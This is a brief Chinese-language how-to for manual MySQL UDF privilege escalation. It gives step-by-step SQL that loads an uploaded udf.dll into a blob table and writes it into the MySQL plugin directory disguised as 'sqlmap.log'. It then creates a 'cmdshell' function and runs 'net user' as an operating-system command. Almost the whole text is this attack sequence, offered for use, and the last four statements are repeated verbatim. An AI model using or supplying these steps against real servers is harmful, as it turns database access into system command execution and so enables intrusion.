udf手动导出提权
当默认udf导出失败时,可以尝试用手动方法导出udf进行提权,具体方法如下:
先上传udf.dll,连接到mysql,再按下面步骤执行sql语句。
create table zz(abc longblob);//注意列类型为longblob
insert into zz values(load_file('c:/tmp/cmd.txt')); //上传的udf.dll路径
select abc from zz into dumpfile 'C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/sqlmap.log'; //导入的目标地址 mysql 5.0以上要导入到系统目录
Create Function cmdshell returns string soname 'sqlmap.log';
select cmdshell (' net user ');
insert into zz values(load_file('c:/tmp/cmd.txt')); //上传的udf.dll路径
select abc from zz into dumpfile 'C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/sqlmap.log'; //导入的目标地址 mysql 5.0以上要导入到系统目录
Create Function cmdshell returns string soname 'sqlmap.log';
select cmdshell (' net user ');
